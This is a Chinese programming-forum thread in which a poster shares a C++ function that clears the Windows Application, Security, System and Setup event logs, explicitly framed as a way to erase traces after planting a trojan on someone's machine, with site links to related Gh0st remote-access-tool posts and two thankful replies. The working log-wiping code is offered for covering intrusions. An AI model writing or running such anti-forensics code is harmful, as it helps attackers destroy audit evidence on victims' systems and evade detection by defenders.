VC驿站

 找回密码
 加入驿站

QQ登录

只需一步,快速开始

搜索
查看: 1163|回复: 2

[交流] 今日一贴!清理系统事件查看器,新手观摩。

[复制链接]
75_avatar_middle
最佳答案
0 
在线会员 发表于 7 天前 | 显示全部楼层 |阅读模式
这是一个用于清理系统事件的代码,自己这几天刚好学习到这块,分享一下,至于作用嘛,你下了马肯定要清理痕迹咯,当然这个是最基础的,大牛没有必要看,(清理完之后,还是会留下2条痕迹,知道有人清理过该事件,只用于新手交流)
void CleanEvent()
{
        char*strEvent[] = { "Application","Security","System","Setup" };
        for (int i = 0; i < sizeof(strEvent) / sizeof(char*); i++)
        {
                HANDLE hHandle = OpenEventLog(NULL, strEvent[i]);
                if (hHandle == NULL)
                {
                        continue;
                }
                ClearEventLog(hHandle, NULL);//清理打开的时间日志
                CloseEventLog(hHandle);//关闭事件句柄
        }
}








上一篇:关于Gh0st清理事件查看器
下一篇:今日一贴,分享一个Gh0st的打开对方cmd的窗口类文件

本帖被以下淘专辑推荐:

08_avatar_middle
最佳答案
0 
在线会员 发表于 7 天前 | 显示全部楼层
看懂了多谢。
58_avatar_middle
最佳答案
8 
online_vip 发表于 7 天前 | 显示全部楼层
终于找到了Windows日志相关函数,嘿嘿。
您需要登录后才可以回帖 登录 | 加入驿站 qq_login

本版积分规则

关闭

站长提醒上一条 /2 下一条

QQ|小黑屋|手机版|VC驿站 ( 辽ICP备09019393号tongdun|网站地图wx_jqr

GMT+8, 2019-12-8 06:06

Powered by Discuz! X3.4

© 2009-2019 cctry.com

快速回复 返回顶部 返回列表